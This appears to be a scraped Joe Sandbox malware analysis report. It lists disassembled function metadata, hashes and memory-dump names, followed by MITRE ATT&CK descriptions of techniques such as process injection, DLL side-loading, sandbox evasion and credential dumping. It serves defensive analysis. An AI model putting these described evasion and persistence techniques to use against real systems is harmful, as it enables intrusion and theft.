Associated: 0000000D.00000002.2031452271.0000000001090000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000002.2031452271.0000000001096000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000002.2031452271.00000000010D2000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000002.2031452271.0000000001133000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000002.2031452271.0000000001139000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_1010000_TBsjWljiCpR.jbxd

Similarity

API ID: DebugPrintTimes
String ID: $
API String ID: 3446177414-3993045852
Opcode ID: 3f99b7c71a3935669b10a39ffbf4df321993e5226be26d97f0cd90bf9bebf5c6
Instruction ID: c834b9df4bbc1007d5bf7dba98b752e8f75a9bcad22fd0567d9bd4174451cfa1
Opcode Fuzzy Hash: 3f99b7c71a3935669b10a39ffbf4df321993e5226be26d97f0cd90bf9bebf5c6
Instruction Fuzzy Hash: 77115E32904218EBCF15AF94E8586DD7B71FF48364F108129F96A6B2D4CB715A40DF80

Function 0106EF28 Relevance: 6.3, APIs: 4, Instructions: 347COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.2031452271.0000000001036000.00000040.00001000.00020000.00000000.sdmp, Offset: 01010000, based on PE: true

Associated: 0000000D.00000002.2031452271.0000000001010000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000002.2031452271.0000000001017000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000002.2031452271.0000000001090000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000002.2031452271.0000000001096000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000002.2031452271.00000000010D2000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000002.2031452271.0000000001133000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000002.2031452271.0000000001139000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_1010000_TBsjWljiCpR.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 282862fd7316b9f113ba129f54e0543c8b7edba34df912ebec264043fee924c4
Instruction ID: 3893bc67b3bc9464e2e297abe2131c4c04fd56cf445b1112a71893db0dd4d21c
Opcode Fuzzy Hash: 282862fd7316b9f113ba129f54e0543c8b7edba34df912ebec264043fee924c4
Instruction Fuzzy Hash: 9FE12270D0030ADFDB65CFA9D990A9DBBF9FF48304F24456AE996AB225D730A841CF10

Function 010BEF50 Relevance: 6.2, APIs: 4, Instructions: 187timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 010BEFE1
RtlDebugPrintTimes.NTDLL ref: 010BF009
RtlDebugPrintTimes.NTDLL ref: 010BF0AC
RtlDebugPrintTimes.NTDLL ref: 010BF160

Memory Dump Source

Source File: 0000000D.00000002.2031452271.0000000001096000.00000040.00001000.00020000.00000000.sdmp, Offset: 01010000, based on PE: true

Associated: 0000000D.00000002.2031452271.0000000001010000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000002.2031452271.0000000001017000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000002.2031452271.0000000001036000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000002.2031452271.0000000001090000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000002.2031452271.00000000010D2000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000002.2031452271.0000000001133000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000002.2031452271.0000000001139000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_1010000_TBsjWljiCpR.jbxd

Similarity

API ID: DebugPrintTimes
String ID:
API String ID: 3446177414-0
Opcode ID: 83e39729da5fdb05728cd0564cb76cf60689e994ee85030bb26d5f245f088998
Instruction ID: 7bfadd552ef5646d80cbfbd627415024a568bb42a27ecbc0a020c6c95422a66a
Opcode Fuzzy Hash: 83e39729da5fdb05728cd0564cb76cf60689e994ee85030bb26d5f245f088998
Instruction Fuzzy Hash: FE713471E0021AAFDF05DFA8C884ADDBBF5BF48314F14842AEA45EB254D734A905CBA4

Function 010BF1D6 Relevance: 6.2, APIs: 4, Instructions: 150timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 010BF26D
RtlDebugPrintTimes.NTDLL ref: 010BF292
RtlDebugPrintTimes.NTDLL ref: 010BF324
RtlDebugPrintTimes.NTDLL ref: 010BF378

Memory Dump Source

Source File: 0000000D.00000002.2031452271.0000000001096000.00000040.00001000.00020000.00000000.sdmp, Offset: 01010000, based on PE: true

Associated: 0000000D.00000002.2031452271.0000000001010000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000002.2031452271.0000000001017000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000002.2031452271.0000000001036000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000002.2031452271.0000000001090000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000002.2031452271.00000000010D2000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000002.2031452271.0000000001133000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000002.2031452271.0000000001139000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_1010000_TBsjWljiCpR.jbxd

Similarity

API ID: DebugPrintTimes
String ID:
API String ID: 3446177414-0
Opcode ID: a473e64770b58d932a7170cbecf7e94dcd9c8254844942656784f8c4e93b0639
Instruction ID: bd631c87650c484f0aefe9c2102db7639b0b9f552461402f24752796c664ad6f
Opcode Fuzzy Hash: a473e64770b58d932a7170cbecf7e94dcd9c8254844942656784f8c4e93b0639
Instruction Fuzzy Hash: 56514376E0121AAFDF08CF98D884ADCBBF1BF48354F18802AE955BB250D7389941CF54

Function 01077B2F Relevance: 6.1, APIs: 4, Instructions: 81timethreadCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 01077B52
BaseThreadInitThunk.KERNEL32 ref: 01077B5C
RtlDebugPrintTimes.NTDLL ref: 010B49ED
RtlDebugPrintTimes.NTDLL ref: 010B4A70

Memory Dump Source

Source File: 0000000D.00000002.2031452271.0000000001036000.00000040.00001000.00020000.00000000.sdmp, Offset: 01010000, based on PE: true

Associated: 0000000D.00000002.2031452271.0000000001010000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000002.2031452271.0000000001017000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000002.2031452271.0000000001090000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000002.2031452271.0000000001096000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000002.2031452271.00000000010D2000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000002.2031452271.0000000001133000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000002.2031452271.0000000001139000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_1010000_TBsjWljiCpR.jbxd

Similarity

API ID: DebugPrintTimes$BaseInitThreadThunk
String ID:
API String ID: 4281723722-0
Opcode ID: 7cb57ac5b9efd9309eff4751ff5181097cf519b8db69bd14d447cee6fd6e61ba
Instruction ID: e651f1aa813979ca918f6fba5968fde822fd94de4f96d3f09d9c800dd5ba0593
Opcode Fuzzy Hash: 7cb57ac5b9efd9309eff4751ff5181097cf519b8db69bd14d447cee6fd6e61ba
Instruction Fuzzy Hash: B6310371E00219AFCF25EFA8D884ADDBBF1AB48720F10416AE522B7294C7345A40CF54

Function 010459C0 Relevance: 5.7, APIs: 2, Strings: 1, Instructions: 494COMMON

Download Yara Rule

Strings

@, xrefs: 010A0AA7

Memory Dump Source

Source File: 0000000D.00000002.2031452271.0000000001036000.00000040.00001000.00020000.00000000.sdmp, Offset: 01010000, based on PE: true

Associated: 0000000D.00000002.2031452271.0000000001010000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000002.2031452271.0000000001017000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000002.2031452271.0000000001090000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000002.2031452271.0000000001096000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000002.2031452271.00000000010D2000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000002.2031452271.0000000001133000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000002.2031452271.0000000001139000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_1010000_TBsjWljiCpR.jbxd

Similarity

API ID:
String ID: @
API String ID: 0-2766056989
Opcode ID: 49113c6cb72a3e5c52c67c1bff0371598f8cc3e17ac1e5a7363f1533b56fdac8
Instruction ID: 6931598b4f27727333f167545e98c59e9590bd35a6b27940da2d6d853164cd28
Opcode Fuzzy Hash: 49113c6cb72a3e5c52c67c1bff0371598f8cc3e17ac1e5a7363f1533b56fdac8
Instruction Fuzzy Hash: 6C3247B0D0426ADFDB65DF68C884BEEBBF0BB19304F0081E9D589A7241E7755A84CF91

Function 01087D61 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 284COMMON

Download Yara Rule

APIs

__aulldvrm.LIBCMT ref: 01087E8B

Strings

+, xrefs: 01087DE8
-, xrefs: 01087DDD

Memory Dump Source

Source File: 0000000D.00000002.2031452271.0000000001036000.00000040.00001000.00020000.00000000.sdmp, Offset: 01010000, based on PE: true

Associated: 0000000D.00000002.2031452271.0000000001010000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000002.2031452271.0000000001017000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000002.2031452271.0000000001090000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000002.2031452271.0000000001096000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000002.2031452271.00000000010D2000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000002.2031452271.0000000001133000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000002.2031452271.0000000001139000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_1010000_TBsjWljiCpR.jbxd

Similarity

API ID: __aulldvrm
String ID: +$-
API String ID: 1302938615-2137968064
Opcode ID: d84d73e5c23e50fb3757e9c39722a22be4762bc4311d32b0c95698253cae6a4f
Instruction ID: 9aff572ba3d36a551a21efb7a62f80581554454dfa8f00deb880c2863f6e8d82
Opcode Fuzzy Hash: d84d73e5c23e50fb3757e9c39722a22be4762bc4311d32b0c95698253cae6a4f
Instruction Fuzzy Hash: 2491D771E082169BEB64FF5DC8806BEBBF5AF44320F74455AE9D5E72C9DB3089418B10

Function 0105D02D Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 240timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 0105D3A4

Strings

l, xrefs: 0105D46B
Bl, xrefs: 0105D48C

Memory Dump Source

Source File: 0000000D.00000002.2031452271.0000000001036000.00000040.00001000.00020000.00000000.sdmp, Offset: 01010000, based on PE: true

Associated: 0000000D.00000002.2031452271.0000000001010000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000002.2031452271.0000000001017000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000002.2031452271.0000000001090000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000002.2031452271.0000000001096000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000002.2031452271.00000000010D2000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000002.2031452271.0000000001133000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000002.2031452271.0000000001139000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_1010000_TBsjWljiCpR.jbxd

Similarity

API ID: DebugPrintTimes
String ID: Bl$l
API String ID: 3446177414-208461968
Opcode ID: f1e80c39f810416c5622274a21267fa07a5e9149481a4c2f7cb73525a9b94ddd
Instruction ID: 6a45fd88b4d55b66561bcc2ff779c26c27d24eb6889d9e0784029d6f5184fc07
Opcode Fuzzy Hash: f1e80c39f810416c5622274a21267fa07a5e9149481a4c2f7cb73525a9b94ddd
Instruction Fuzzy Hash: B0A18331A003199BEBB5DB98C890BEFBBB5AB44304F0440EADD89A7245DB74AD85CF51

Function 01085DA4 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 180COMMON

Download Yara Rule

APIs

__startOneArgErrorHandling.LIBCMT ref: 01085E34

Strings

pow, xrefs: 01085E0C, 01085E29

Memory Dump Source

Source File: 0000000D.00000002.2031452271.0000000001036000.00000040.00001000.00020000.00000000.sdmp, Offset: 01010000, based on PE: true

Associated: 0000000D.00000002.2031452271.0000000001010000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000002.2031452271.0000000001017000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000002.2031452271.0000000001090000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000002.2031452271.0000000001096000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000002.2031452271.00000000010D2000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000002.2031452271.0000000001133000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000002.2031452271.0000000001139000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_1010000_TBsjWljiCpR.jbxd

Similarity

API ID: ErrorHandling__start
String ID: pow
API String ID: 3213639722-2276729525
Opcode ID: 7fcccdaa9960b8203d68fe17ab76ca32a56adab73e268e5fc98a45c969dcf33a
Instruction ID: c1346a82087467dddee98d7192b5559918ea1a01984c9d1f4762e33c14d196ad
Opcode Fuzzy Hash: 7fcccdaa9960b8203d68fe17ab76ca32a56adab73e268e5fc98a45c969dcf33a
Instruction Fuzzy Hash: 5C516A7191C60696DBA6761CCD013AE3FD4EB40750F10CDA8E4E68A2DDEB39C4D58B4A

Function 01074C59 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 164COMMON

Download Yara Rule

Strings

0, xrefs: 01074CC3
Flst, xrefs: 01074C96

Memory Dump Source

Source File: 0000000D.00000002.2031452271.0000000001036000.00000040.00001000.00020000.00000000.sdmp, Offset: 01010000, based on PE: true

Associated: 0000000D.00000002.2031452271.0000000001010000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000002.2031452271.0000000001017000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000002.2031452271.0000000001090000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000002.2031452271.0000000001096000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000002.2031452271.00000000010D2000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000002.2031452271.0000000001133000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000002.2031452271.0000000001139000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_1010000_TBsjWljiCpR.jbxd

Similarity

API ID:
String ID: 0$Flst
API String ID: 0-758220159
Opcode ID: 95e2b9b252c58e8fdbb65a22a953d4b923d362889740e447ffce4061ba52d359
Instruction ID: 9cd65aa0ef75d891175403c945321e65928db4526d3cea36019d61c523d7c20e
Opcode Fuzzy Hash: 95e2b9b252c58e8fdbb65a22a953d4b923d362889740e447ffce4061ba52d359
Instruction Fuzzy Hash: 2B5169B1E002588BDF66DF99C8846A9FBF4FF44714F2580AAD0C9DB251E7709D85CB88

Function 0106D7B0 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 151timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 0106D959

Part of subcall function 01044859: RtlDebugPrintTimes.NTDLL ref: 010448F7

Strings

$, xrefs: 0106D900
$, xrefs: 0106D86D

Memory Dump Source

Source File: 0000000D.00000002.2031452271.0000000001036000.00000040.00001000.00020000.00000000.sdmp, Offset: 01010000, based on PE: true

Associated: 0000000D.00000002.2031452271.0000000001010000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000002.2031452271.0000000001017000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000002.2031452271.0000000001090000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000002.2031452271.0000000001096000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000002.2031452271.00000000010D2000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000002.2031452271.0000000001133000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000002.2031452271.0000000001139000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_1010000_TBsjWljiCpR.jbxd

Similarity

API ID: DebugPrintTimes
String ID: $$$
API String ID: 3446177414-233714265
Opcode ID: eb6cfeac320535b195931f4c0e539d6bcd5a4e64ef622dd2d18676ce1867967a
Instruction ID: ac9e517746b78de68930cfb8b6835e1c9e10a0938b09d7b451bd46675260c5f7
Opcode Fuzzy Hash: eb6cfeac320535b195931f4c0e539d6bcd5a4e64ef622dd2d18676ce1867967a
Instruction Fuzzy Hash: E651DD71A003469FDB68DFE8C4887DEBBF2BF48714F1441A9C8D56B289D774A981CB90

Function 010BFD82 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 109timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 010BFE73
RtlDebugPrintTimes.NTDLL ref: 010BFE95

Strings

$, xrefs: 010BFE3D

Memory Dump Source

Source File: 0000000D.00000002.2031452271.0000000001096000.00000040.00001000.00020000.00000000.sdmp, Offset: 01010000, based on PE: true

Associated: 0000000D.00000002.2031452271.0000000001010000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000002.2031452271.0000000001017000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000002.2031452271.0000000001036000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000002.2031452271.0000000001090000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000002.2031452271.00000000010D2000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000002.2031452271.0000000001133000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000002.2031452271.0000000001139000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_1010000_TBsjWljiCpR.jbxd

Similarity

API ID: DebugPrintTimes
String ID: $
API String ID: 3446177414-3993045852
Opcode ID: 0b1b1c3ca973cfa3ca756ad9272484d26f0a45d4c7e083ad08f13b019b4e5adc
Instruction ID: 12463926b6ee7224c73f53c337ba068441d5d519f92b48ab6eca980840dfb248
Opcode Fuzzy Hash: 0b1b1c3ca973cfa3ca756ad9272484d26f0a45d4c7e083ad08f13b019b4e5adc
Instruction Fuzzy Hash: DA419F75A0020AABDF11DF99C880AEEBBF5FF48B14F140169E964B7342D7719951CB90

Function 0103DF81 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 109timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 0103E040

Strings

0, xrefs: 0103E020
0, xrefs: 0103E00B

Memory Dump Source

Source File: 0000000D.00000002.2031452271.0000000001036000.00000040.00001000.00020000.00000000.sdmp, Offset: 01010000, based on PE: true

Associated: 0000000D.00000002.2031452271.0000000001010000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000002.2031452271.0000000001017000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000002.2031452271.0000000001090000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000002.2031452271.0000000001096000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000002.2031452271.00000000010D2000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000002.2031452271.0000000001133000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000002.2031452271.0000000001139000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_1010000_TBsjWljiCpR.jbxd

Similarity

API ID: DebugPrintTimes
String ID: 0$0
API String ID: 3446177414-203156872
Opcode ID: bb2169097c535ff010d16bf327e0042f6bef4f867dd94504e9ef79b11fd50723
Instruction ID: 1dd52175bf41b46f8ce6fae932a38ede1e5129f2c72dcf8a1ce188059a793dfa
Opcode Fuzzy Hash: bb2169097c535ff010d16bf327e0042f6bef4f867dd94504e9ef79b11fd50723
Instruction Fuzzy Hash: B4418BB16087069FC350CF28C484A5ABBE8BF88314F044A6EF988DB351D771EA45CF86

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically may require being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Container: Container Creation, File: File Creation, File: File Modification, Process: Process Creation, Scheduled Job: Scheduled Job Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may circumvent mechanisms designed to control elevate privileges to gain higher-level permissions. Most modern systems contain native elevation control mechanisms that are intended to limit privileges that a user can perform on a machine. Authorization has to be granted to specific users in order to perform tasks that can be considered of higher risk. An adversary can perform several methods to take advantage of built-in control mechanisms in order to escalate privileges on a system.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Modification, Windows Registry: Windows Registry Key Modification
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to hide configuration information within Registry keys, remove information as part of cleaning up, or as part of other techniques to aid in persistence and execution.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
